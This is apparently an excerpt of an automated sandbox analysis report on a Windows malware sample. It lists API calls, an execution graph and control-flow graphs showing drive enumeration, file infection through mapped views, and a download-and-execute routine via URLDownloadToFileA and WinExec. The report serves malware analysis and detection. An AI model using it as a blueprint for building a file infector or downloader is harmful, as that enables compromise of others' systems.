                                                                                        • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                        • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                        • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_400000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                      • String ID:
                                                                                      • API String ID: 1885482327-0
                                                                                      • Opcode ID: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                                                                      • Instruction ID: 9d6088553fbd849a34ffa1589a5f9bffd683413c7e042594889390f4c4f3f426
                                                                                      • Opcode Fuzzy Hash: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                                                                      • Instruction Fuzzy Hash: 08F0C2B2208144F7DB019A958DA0FBA36299B44314F300633B617B91F5C57C8A02E72F
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNELBASE(00000000,00417F99), ref: 00417AFD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779981912.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_40b000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocGlobal
                                                                                      • String ID:
                                                                                      • API String ID: 3761449716-0
                                                                                      • Opcode ID: 0978ef2af6f889954126f1639b5d39f7fcb4e9f6f80359241490d42005375475
                                                                                      • Instruction ID: 11052f0533907eac1b5ead624f86bd19dd77f4dadc222b17fd93c0952cc8d916
                                                                                      • Opcode Fuzzy Hash: 0978ef2af6f889954126f1639b5d39f7fcb4e9f6f80359241490d42005375475
                                                                                      • Instruction Fuzzy Hash: DDB092B08083059FEB404F269C093593A20F704272F18877AED28882E5EBA08A40AF25
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNELBASE(00000000,00417F99), ref: 00417AFD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779981912.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_40b000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocGlobal
                                                                                      • String ID:
                                                                                      • API String ID: 3761449716-0
                                                                                      • Opcode ID: 82d2b05aa270e2ebe1c3121fb221fe189987ee2b6f2f6f9fdafd653cff0eabde
                                                                                      • Instruction ID: cd47c4b9bc37ffacf91a7bbe6c6ae0b538b313659090cfa5301434a9e3d42730
                                                                                      • Opcode Fuzzy Hash: 82d2b05aa270e2ebe1c3121fb221fe189987ee2b6f2f6f9fdafd653cff0eabde
                                                                                      • Instruction Fuzzy Hash: 77B012B44002008FC7400F50AC14B413E20E30C343F008334E60444170C7704100BF19
                                                                                      APIs
                                                                                      • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00417C8F
                                                                                      • OpenJobObjectW.KERNEL32(00000000,00000000,00000000), ref: 00417CAC
                                                                                      • BuildCommDCBW.KERNEL32(00000000,?), ref: 00417CB7
                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 00417CBE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779981912.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_40b000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$BuildCommCreateLibraryLoadOpen
                                                                                      • String ID:
                                                                                      • API String ID: 2043902199-0
                                                                                      • Opcode ID: 31cceed8ed1ed4da9f0d8d6c08b2eb6b474c8c2503fdc1db59d39d211b27b345
                                                                                      • Instruction ID: ff2d894db08d9522882be8ab69f88837e2f2e12f0baac11470308de566c9cd02
                                                                                      • Opcode Fuzzy Hash: 31cceed8ed1ed4da9f0d8d6c08b2eb6b474c8c2503fdc1db59d39d211b27b345
                                                                                      • Instruction Fuzzy Hash: A5E06D31402124EB8B106F25ED1CCCB7FBCEF0A355B008224F50191161E3384A41CFED
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(004B1090), ref: 00417BFE
                                                                                      • GetProcAddress.KERNEL32(00000000,0041E260), ref: 00417C3B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779981912.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_40b000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID:
                                                                                      • API String ID: 1646373207-3916222277
                                                                                      • Opcode ID: ed2083ff09e95ea6850085758e8778e50b5988604f5a41a0041129fa4c538e93
                                                                                      • Instruction ID: 842860c07696174ee3ee74213301e8bfe93044c7bdd6e35420a9822fc7fd421d
                                                                                      • Opcode Fuzzy Hash: ed2083ff09e95ea6850085758e8778e50b5988604f5a41a0041129fa4c538e93
                                                                                      • Instruction Fuzzy Hash: DC31822955C3C0D9F30197A9BC367A13BA99B15B44F5446BADE448B2B1D3F60584C32E

                                                                                      Execution Graph

                                                                                      Execution Coverage:26.3%
                                                                                      Dynamic/Decrypted Code Coverage:6.6%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:288
                                                                                      Total number of Limit Nodes:13
                                                                                      execution_graph 886 ee6076 887 ee60c7 886->887 888 ee607b 886->888 889 ee615f VirtualFree 887->889 891 ee6198 VirtualFree 887->891 892 ee60d5 VirtualAlloc 887->892 888->887 890 ee60b0 VirtualAlloc 888->890 898 ee61b2 888->898 889->887 890->887 891->898 892->887 893 ee6389 VirtualProtect 896 ee63b7 893->896 894 ee63fc VirtualProtect 895 ee6400 894->895 896->894 897 ee63e7 VirtualProtect 896->897 897->894 897->896 898->893 899 ee62fb 898->899 1205 ee6014 1206 ee6035 GetModuleHandleA 1205->1206 1207 ee605f 1205->1207 1208 ee604d GetProcAddress 1206->1208 1209 ee6058 1208->1209 1209->1207 1209->1208 1209->1209 900 ee14e1 901 ee14fd GetModuleHandleA 900->901 902 ee1541 900->902 905 ee151a VirtualQuery 901->905 906 ee1512 901->906 903 ee1549 902->903 904 ee1573 902->904 907 ee1569 903->907 909 ee1557 903->909 913 ee1638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 904->913 905->906 906->902 929 ee1af9 909->929 910 ee1579 ExitProcess 912 ee1566 912->907 914 ee167f 913->914 915 ee167a 913->915 935 ee1718 GetSystemTimeAsFileTime 914->935 953 ee139f GetVersionExA 915->953 918 ee1686 919 ee16ca 918->919 924 ee16a0 CreateThread 918->924 920 ee16d7 919->920 921 ee16d0 919->921 923 ee16dd lstrcpy 920->923 926 ee16d5 920->926 947 ee1581 921->947 923->910 940 ee2c48 memset 924->940 1185 ee1099 924->1185 926->910 928 ee1718 3 API calls 928->919 930 ee1b09 929->930 931 ee1b11 929->931 932 ee1638 188 API calls 930->932 933 ee1b16 CreateThread 931->933 934 ee1b0f 931->934 932->934 933->934 1204 ee1638 189 API calls 933->1204 934->912 934->934 936 ee1754 935->936 937 ee1735 SHSetValueA 935->937 938 ee175a SHGetValueA 936->938 939 ee1786 __aulldiv 936->939 937->939 938->939 939->918 974 ee1973 PathFileExistsA 940->974 943 ee2cb2 945 ee2cbb VirtualFree 943->945 946 ee16ba WaitForSingleObject 943->946 944 ee2c8f CreateThread WaitForMultipleObjects 944->943 996 ee2b8c memset GetLogicalDriveStringsA 944->996 945->946 946->928 1165 ee185b GetSystemTimeAsFileTime srand rand srand rand 947->1165 949 ee1592 wsprintfA wsprintfA lstrlen CreateFileA 950 ee15fb WriteFile CloseHandle 949->950 951 ee1633 949->951 950->951 952 ee161d ShellExecuteA 950->952 951->926 952->951 954 ee13cf LookupPrivilegeValueA 953->954 955 ee14da 953->955 956 ee13e7 954->956 957 ee13ef 954->957 955->914 1166 ee119f GetCurrentProcess OpenProcessToken 956->1166 957->955 1171 ee120e GetModuleHandleA GetProcAddress 957->1171 963 ee1448 GetCurrentProcessId 963->955 964 ee1457 963->964 964->955 965 ee1319 3 API calls 964->965 966 ee147f 965->966 967 ee1319 3 API calls 966->967 968 ee148e 967->968 968->955 969 ee1319 3 API calls 968->969 970 ee14b4 969->970 971 ee1319 3 API calls 970->971 972 ee14c3 971->972 973 ee1319 3 API calls 972->973 973->955 975 ee19a0 974->975 976 ee1ac7 974->976 977 ee19af CreateFileA 975->977 976->943 976->944 978 ee1a28 GetFileSize 977->978 979 ee19c4 Sleep 977->979 980 ee1a38 978->980 991 ee1a80 978->991 979->977 981 ee19d5 979->981 982 ee1a3d VirtualAlloc 980->982 980->991 995 ee185b GetSystemTimeAsFileTime srand rand srand rand 981->995 986 ee1a53 982->986 982->991 983 ee1a8d FindCloseChangeNotification 984 ee1a96 983->984 987 ee1a9c DeleteFileA 984->987 988 ee1aad 984->988 990 ee1a59 ReadFile 986->990 986->991 987->988 988->976 994 ee1ab8 VirtualFree 988->994 989 ee19da wsprintfA CopyFileA 989->978 993 ee1a0d CreateFileA 989->993 990->986 990->991 991->983 991->984 993->978 993->987 994->976 995->989 997 ee2bc8 996->997 998 ee2c09 WaitForMultipleObjects 996->998 999 ee2bfa lstrlen 997->999 1002 ee2bd2 GetDriveTypeA 997->1002 1003 ee2be3 CreateThread 997->1003 1000 ee2c3c 998->1000 1001 ee2c2a CreateThread 998->1001 999->997 999->998 1001->1000 1007 ee2845 1001->1007 1002->997 1002->999 1003->999 1004 ee2b7d 1003->1004 1018 ee29e2 memset wsprintfA 1004->1018 1155 ee274a memset memset SHGetSpecialFolderPathA wsprintfA 1007->1155 1009 ee2878 DeleteFileA 1011 ee288c VirtualFree 1009->1011 1012 ee289a 1009->1012 1010 ee2853 1010->1009 1013 ee2692 8 API calls 1010->1013 1016 ee2859 1010->1016 1011->1012 1014 ee28ab 1012->1014 1015 ee28a4 CloseHandle 1012->1015 1013->1010 1015->1014 1017 ee239d 186 API calls 1016->1017 1017->1010 1019 ee2abc memset memset FindFirstFileA 1018->1019 1020 ee2a3a memset lstrlen lstrcpyn strrchr 1018->1020 1032 ee28b8 memset wsprintfA 1019->1032 1020->1019 1021 ee2a88 1020->1021 1021->1019 1023 ee2a9a lstrcmpiA 1021->1023 1025 ee2aad lstrlen 1023->1025 1026 ee2b74 1023->1026 1025->1019 1025->1023 1027 ee2b61 FindNextFileA 1028 ee2b6d FindClose 1027->1028 1029 ee2b23 1027->1029 1028->1026 1030 ee2b35 lstrcmpiA 1029->1030 1031 ee28b8 174 API calls 1029->1031 1030->1028 1030->1029 1031->1027 1033 ee2905 1032->1033 1038 ee2951 memset 1032->1038 1034 ee291b memset wsprintfA 1033->1034 1035 ee2956 strrchr 1033->1035 1033->1038 1036 ee29e2 180 API calls 1034->1036 1037 ee2967 lstrcmpiA 1035->1037 1035->1038 1036->1038 1039 ee297a 1037->1039 1040 ee2988 lstrcmpiA 1037->1040 1038->1027 1050 ee1e6e 1039->1050 1040->1038 1042 ee2994 1040->1042 1043 ee29ad strstr 1042->1043 1046 ee29a5 lstrcpy 1042->1046 1044 ee29cb 1043->1044 1045 ee29d3 1043->1045 1093 ee239d strstr 1044->1093 1115 ee2692 1045->1115 1046->1043 1051 ee1e7d 1050->1051 1124 ee1df6 strrchr 1051->1124 1054 ee2332 1058 ee233d UnmapViewOfFile 1054->1058 1059 ee2346 1054->1059 1055 ee1eb0 SetFileAttributesA CreateFileA 1055->1054 1056 ee1edf 1055->1056 1129 ee1915 1056->1129 1058->1059 1061 ee234b CloseHandle 1059->1061 1062 ee2350 1059->1062 1061->1062 1063 ee2356 CloseHandle 1062->1063 1064 ee2391 1062->1064 1063->1064 1064->1038 1065 ee1f2e 1065->1054 1135 ee1c81 1065->1135 1069 ee1f92 1070 ee1c81 2 API calls 1069->1070 1071 ee1f9f 1070->1071 1071->1054 1072 ee1af9 169 API calls 1071->1072 1073 ee2024 1071->1073 1077 ee1fc0 1072->1077 1073->1054 1074 ee1af9 169 API calls 1073->1074 1075 ee207a 1074->1075 1076 ee1af9 169 API calls 1075->1076 1081 ee2090 1076->1081 1077->1054 1077->1073 1078 ee1af9 169 API calls 1077->1078 1079 ee1ffe 1078->1079 1080 ee2013 FlushViewOfFile 1079->1080 1080->1073 1082 ee20bb memset memset 1081->1082 1083 ee20f5 1082->1083 1084 ee1c81 2 API calls 1083->1084 1086 ee21de 1084->1086 1085 ee2226 memcpy UnmapViewOfFile CloseHandle 1140 ee1b8a 1085->1140 1086->1085 1088 ee226e 1148 ee185b GetSystemTimeAsFileTime srand rand srand rand 1088->1148 1090 ee22ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1091 ee1915 3 API calls 1090->1091 1092 ee231f CloseHandle 1091->1092 1092->1054 1094 ee2451 CreateFileA GetFileSize 1093->1094 1100 ee23d8 1093->1100 1095 ee2675 CloseHandle 1094->1095 1096 ee2480 1094->1096 1097 ee267c RemoveDirectoryA 1095->1097 1096->1095 1098 ee2499 1096->1098 1099 ee2687 1097->1099 1101 ee1915 3 API calls 1098->1101 1099->1038 1100->1094 1100->1099 1102 ee24a4 9 API calls 1101->1102 1150 ee189d memset CreateProcessA 1102->1150 1105 ee255c Sleep memset wsprintfA 1106 ee29e2 163 API calls 1105->1106 1107 ee2597 memset wsprintfA Sleep 1106->1107 1108 ee189d 6 API calls 1107->1108 1109 ee25e4 Sleep CreateFileA 1108->1109 1110 ee1915 3 API calls 1109->1110 1111 ee2610 CloseHandle 1110->1111 1111->1097 1112 ee261e 1111->1112 1112->1097 1113 ee2641 SetFilePointer WriteFile 1112->1113 1113->1097 1114 ee2667 SetEndOfFile 1113->1114 1114->1097 1116 ee26b2 WaitForSingleObject 1115->1116 1117 ee26a2 CreateEventA 1115->1117 1118 ee2708 1116->1118 1119 ee26c1 lstrlen ??2@YAPAXI 1116->1119 1117->1116 1120 ee2736 SetEvent 1118->1120 1123 ee2718 lstrcpy ??3@YAXPAX 1118->1123 1119->1120 1121 ee26da lstrcpy 1119->1121 1120->1038 1122 ee26f1 1121->1122 1122->1120 1123->1122 1125 ee1e62 1124->1125 1126 ee1e13 lstrcpy strrchr 1124->1126 1125->1054 1125->1055 1126->1125 1127 ee1e40 lstrcmpiA 1126->1127 1127->1125 1128 ee1e52 lstrlen 1127->1128 1128->1125 1128->1127 1130 ee1928 1129->1130 1133 ee1924 SetFilePointer CreateFileMappingA MapViewOfFile 1129->1133 1131 ee192e memset GetFileTime 1130->1131 1132 ee194f 1130->1132 1131->1133 1132->1133 1134 ee1954 SetFileTime 1132->1134 1133->1054 1133->1065 1134->1133 1136 ee1c9c 1135->1136 1138 ee1c94 1135->1138 1137 ee1cae memset memset 1136->1137 1136->1138 1137->1138 1138->1054 1139 ee185b GetSystemTimeAsFileTime srand rand srand rand 1138->1139 1139->1069 1145 ee1b93 1140->1145 1142 ee1bca srand 1143 ee1bd8 rand 1142->1143 1144 ee1c08 1143->1144 1144->1143 1146 ee1c29 memset memcpy lstrcat 1144->1146 1149 ee185b GetSystemTimeAsFileTime srand rand srand rand 1145->1149 1146->1088 1148->1090 1149->1142 1151 ee190c 1150->1151 1152 ee18e0 CloseHandle WaitForSingleObject 1150->1152 1151->1097 1151->1105 1153 ee18fb GetExitCodeProcess 1152->1153 1154 ee1907 CloseHandle 1152->1154 1153->1154 1154->1151 1164 ee185b GetSystemTimeAsFileTime srand rand srand rand 1155->1164 1157 ee27b5 wsprintfA CopyFileA 1158 ee27de wsprintfA 1157->1158 1159 ee2840 1157->1159 1160 ee1973 17 API calls 1158->1160 1159->1010 1161 ee280f 1160->1161 1162 ee2813 DeleteFileA 1161->1162 1163 ee2820 CreateFileA 1161->1163 1162->1163 1163->1159 1164->1157 1165->949 1167 ee11c6 AdjustTokenPrivileges 1166->1167 1168 ee1200 CloseHandle 1166->1168 1169 ee11f6 1167->1169 1170 ee11f7 CloseHandle 1167->1170 1168->957 1169->1170 1170->1168 1172 ee123f GetCurrentProcessId OpenProcess 1171->1172 1173 ee1310 1171->1173 1172->1173 1177 ee1262 1172->1177 1173->955 1180 ee1319 1173->1180 1174 ee12b0 VirtualAlloc 1174->1177 1179 ee12b8 1174->1179 1175 ee12f1 CloseHandle 1175->1173 1176 ee1302 VirtualFree 1175->1176 1176->1173 1177->1174 1177->1175 1178 ee1296 VirtualFree 1177->1178 1177->1179 1178->1174 1179->1175 1181 ee134a 1180->1181 1182 ee132a GetModuleHandleA GetProcAddress 1180->1182 1183 ee1351 memset 1181->1183 1184 ee1363 1181->1184 1182->1181 1182->1184 1183->1184 1184->955 1184->963 1186 ee10ba 1185->1186 1187 ee1196 1185->1187 1186->1187 1203 ee185b GetSystemTimeAsFileTime srand rand srand rand 1186->1203 1189 ee1118 wsprintfA wsprintfA URLDownloadToFileA 1190 ee10dc 1189->1190 1191 ee1168 lstrlen Sleep 1189->1191 1194 ee1000 CreateFileA 1190->1194 1191->1186 1195 ee1025 GetFileSize CreateFileMappingA MapViewOfFile 1194->1195 1196 ee1092 WinExec lstrlen 1194->1196 1197 ee107b 1195->1197 1198 ee1057 1195->1198 1196->1186 1196->1187 1201 ee108d CloseHandle 1197->1201 1202 ee1087 CloseHandle 1197->1202 1199 ee1074 UnmapViewOfFile 1198->1199 1200 ee1061 1198->1200 1199->1197 1200->1199 1201->1196 1202->1201 1203->1189 1210 ee2361 1211 ee236b UnmapViewOfFile 1210->1211 1212 ee2374 1210->1212 1211->1212 1213 ee2379 CloseHandle 1212->1213 1214 ee2382 1212->1214 1213->1214 1215 ee2388 CloseHandle 1214->1215 1216 ee2391 1214->1216 1215->1216

                                                                                      Callgraph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      • Opacity -> Relevance
                                                                                      • Disassembly available
                                                                                      callgraph 0 Function_00EE1E6E 1 Function_00EE1C68 0->1 4 Function_00EE2D60 0->4 9 Function_00EE1AF9 0->9 11 Function_00EE1DF6 0->11 20 Function_00EE185B 0->20 32 Function_00EE1D8A 0->32 33 Function_00EE1B8A 0->33 41 Function_00EE1C81 0->41 46 Function_00EE2D9B 0->46 51 Function_00EE1915 0->51 2 Function_00EE29E2 24 Function_00EE28B8 2->24 3 Function_00EE6B63 23 Function_00EE67A4 3->23 26 Function_00EE6834 3->26 28 Function_00EE69B0 3->28 5 Function_00EE14E1 5->9 25 Function_00EE1638 5->25 6 Function_00EE2361 6->46 7 Function_00EE2B7D 7->2 8 Function_00EE6CF8 9->25 10 Function_00EE6076 17 Function_00EE66C8 10->17 12 Function_00EE6CF2 12->8 13 Function_00EE1973 13->20 14 Function_00EE2CF0 15 Function_00EE274A 15->13 15->20 16 Function_00EE2C48 16->13 31 Function_00EE2B8C 16->31 35 Function_00EE6A84 17->35 36 Function_00EE6B02 17->36 38 Function_00EE6D00 17->38 18 Function_00EE2845 18->15 44 Function_00EE239D 18->44 52 Function_00EE2692 18->52 19 Function_00EE235D 21 Function_00EE17D0 22 Function_00EE65A6 24->0 24->2 24->44 24->52 25->16 25->21 39 Function_00EE1581 25->39 43 Function_00EE139F 25->43 47 Function_00EE1718 25->47 48 Function_00EE1099 25->48 27 Function_00EE6734 27->35 27->36 27->38 29 Function_00EE120E 30 Function_00EE680F 31->7 31->18 33->20 34 Function_00EE600A 35->12 35->30 36->3 37 Function_00EE1000 37->21 38->3 38->12 38->28 39->20 40 Function_00EE6001 40->34 42 Function_00EE119F 43->29 43->42 49 Function_00EE1319 43->49 44->2 45 Function_00EE189D 44->45 44->51 47->14 48->20 48->37 50 Function_00EE6014 53 Function_00EE6012

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 101 ee29e2-ee2a34 memset wsprintfA 102 ee2abc-ee2b21 memset * 2 FindFirstFileA call ee28b8 memset 101->102 103 ee2a3a-ee2a86 memset lstrlen lstrcpyn strrchr 101->103 110 ee2b61-ee2b6b FindNextFileA 102->110 103->102 104 ee2a88-ee2a98 103->104 104->102 106 ee2a9a-ee2aa7 lstrcmpiA 104->106 108 ee2aad-ee2aba lstrlen 106->108 109 ee2b74-ee2b7a 106->109 108->102 108->106 111 ee2b6d-ee2b6e FindClose 110->111 112 ee2b23-ee2b2a 110->112 111->109 113 ee2b4c-ee2b5c call ee28b8 112->113 114 ee2b2c-ee2b33 112->114 113->110 114->113 115 ee2b35-ee2b4a lstrcmpiA 114->115 115->111 115->113
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                                                                      • String ID: %s*$C:\$Documents and Settings
                                                                                      • API String ID: 2826467728-110786608
                                                                                      • Opcode ID: 600af9a7cb924d11f71c67062355d3d4fba2dbc640e8f7a185131b9ee0216a51
                                                                                      • Instruction ID: bef28f145a561a5bce737892cc7476dddce0e3f27acaa1d43e6f94bf1a19b438
                                                                                      • Opcode Fuzzy Hash: 600af9a7cb924d11f71c67062355d3d4fba2dbc640e8f7a185131b9ee0216a51
                                                                                      • Instruction Fuzzy Hash: 5C4133B280438DAFD720DFA1DC89DEBB7ECEB84315F04092DF644E7151E6359A4887A1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 231 ee6076-ee6079 232 ee607b-ee6080 231->232 233 ee60e0-ee60eb 231->233 235 ee60f7-ee60f8 232->235 236 ee6082-ee6085 232->236 234 ee60ee-ee60f4 233->234 237 ee60f6 234->237 239 ee60fe-ee6106 235->239 240 ee60fa-ee60fc call ee66c8 235->240 236->237 238 ee6087 236->238 237->235 238->234 241 ee6089-ee6095 238->241 243 ee6108-ee611d 239->243 244 ee6155-ee6189 VirtualFree 239->244 240->239 245 ee6097-ee609f 241->245 246 ee60a1-ee60aa 241->246 248 ee611f-ee6121 243->248 253 ee618c-ee6192 244->253 245->246 251 ee61ba-ee61c8 246->251 252 ee60b0-ee60c1 VirtualAlloc 246->252 249 ee6123 248->249 250 ee6151-ee6154 248->250 249->250 254 ee6125-ee6128 249->254 250->244 257 ee61ca-ee61d7 251->257 258 ee6243-ee6251 251->258 255 ee60c7-ee60cf 252->255 253->255 256 ee6198-ee61b0 VirtualFree 253->256 260 ee612a-ee612e 254->260 261 ee6134-ee613b 254->261 255->253 262 ee60d5-ee60df VirtualAlloc 255->262 256->251 265 ee61b2-ee61b4 256->265 259 ee61dd-ee61e0 257->259 263 ee6264-ee626f 258->263 264 ee6253 258->264 259->258 267 ee61e2-ee61f2 259->267 260->261 274 ee6130-ee6132 260->274 261->274 275 ee613d-ee614f 261->275 262->233 266 ee6271-ee6276 263->266 270 ee6255-ee6258 264->270 265->251 271 ee627c-ee6289 266->271 272 ee6389-ee63b1 VirtualProtect 266->272 273 ee61f5-ee61fe 267->273 270->263 276 ee625a-ee6262 270->276 287 ee628b 271->287 288 ee6292-ee6298 271->288 279 ee63b7-ee63ba 272->279 277 ee620c-ee6219 273->277 278 ee6200-ee6203 273->278 274->248 275->248 276->270 283 ee6238-ee623f 277->283 281 ee621b-ee6228 278->281 282 ee6205-ee6208 278->282 284 ee63fc-ee63ff VirtualProtect 279->284 285 ee63bc-ee63c2 279->285 281->283 289 ee622a-ee6236 282->289 290 ee620a 282->290 283->273 292 ee6241 283->292 286 ee6400-ee6416 284->286 285->285 291 ee63c4 285->291 293 ee6418-ee641d 286->293 294 ee6420-ee6425 286->294 287->288 295 ee62a2-ee62ac 288->295 289->283 290->283 291->284 296 ee63c6-ee63cf 291->296 292->259 297 ee62ae 295->297 298 ee62b1-ee62c8 295->298 299 ee63d4-ee63d8 296->299 300 ee63d1 296->300 297->298 301 ee62ce-ee62d4 298->301 302 ee6373-ee6384 298->302 303 ee63dd-ee63e1 299->303 304 ee63da 299->304 300->299 305 ee62da-ee62f1 301->305 306 ee62d6-ee62d9 301->306 302->266 307 ee63e7-ee63fa VirtualProtect 303->307 308 ee63e3 303->308 304->303 310 ee6365-ee636e 305->310 311 ee62f3-ee62f9 305->311 306->305 307->279 307->284 308->307 310->295 312 ee62fb-ee630f 311->312 313 ee6314-ee6326 311->313 314 ee6426-ee64c0 312->314 315 ee634c-ee6360 313->315 316 ee6328-ee634a 313->316 325 ee6535-ee6537 314->325 326 ee64c2 314->326 315->314 316->310 327 ee659a 325->327 328 ee6539 325->328 329 ee64f8 326->329 330 ee64c5-ee64cd 326->330 333 ee659b-ee659d 327->333 331 ee653b-ee6541 328->331 332 ee65b4 328->332 336 ee656c-ee656f 329->336 337 ee64fa-ee64fe 329->337 334 ee64cf-ee64d4 330->334 335 ee6542-ee6545 330->335 331->335 343 ee65be-ee65db 332->343 338 ee659f 333->338 339 ee6591-ee6593 333->339 341 ee64d6-ee64d9 334->341 342 ee6517-ee651c 334->342 340 ee654d-ee6550 335->340 344 ee6572 336->344 337->344 345 ee6500 337->345 349 ee6588-ee658b 338->349 339->333 348 ee6595 339->348 340->343 350 ee6552-ee6556 340->350 341->340 351 ee64db-ee64f5 341->351 346 ee651d-ee651e 342->346 347 ee6583-ee6587 342->347 360 ee65dd-ee65f6 343->360 353 ee6573-ee6576 344->353 354 ee6522-ee6533 345->354 355 ee6502 345->355 346->354 347->349 348->327 356 ee658d-ee658f 349->356 357 ee65a1-ee65a3 349->357 358 ee6578-ee657a 350->358 359 ee6558-ee6569 350->359 351->329 353->358 354->325 355->353 361 ee6504-ee6513 355->361 356->339 358->360 363 ee657c 358->363 359->336 362 ee65f7-ee6608 360->362 361->325 364 ee6515 361->364 363->362 365 ee657e-ee657f 363->365 364->342 365->347
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00001800,00001000,00000004), ref: 00EE60BE
                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 00EE60DF
                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00EE6189
                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00EE61A5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$AllocFree
                                                                                      • String ID: kernel32.dll
                                                                                      • API String ID: 2087232378-1793498882
                                                                                      • Opcode ID: 6ba047a1a3f11f3cc178101d1b1eba4fa68128cc721f26e82bfa4c210a5c4c8f
                                                                                      • Instruction ID: ccfa69a9712d4d0adda61d275d6cf763c284bba8c2422125aca65bb48a53a9dd
                                                                                      • Opcode Fuzzy Hash: 6ba047a1a3f11f3cc178101d1b1eba4fa68128cc721f26e82bfa4c210a5c4c8f
                                                                                      • Instruction Fuzzy Hash: 791256726087C98FDB328F25CC45BEA3BB0EF26354F18159DD989AB2A3D374A904C751

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 366 ee1718-ee1733 GetSystemTimeAsFileTime 367 ee1754-ee1758 366->367 368 ee1735-ee1752 SHSetValueA 366->368 369 ee17c6-ee17cd 367->369 370 ee175a-ee1784 SHGetValueA 367->370 368->369 370->369 371 ee1786-ee17b3 call ee2cf0 * 2 370->371 371->369 376 ee17b5 371->376 377 ee17bf 376->377 378 ee17b7-ee17bd 376->378 377->369 378->369 378->377
                                                                                      APIs
                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00EE1729
                                                                                      • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00EE174C
                                                                                      • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00EE177C
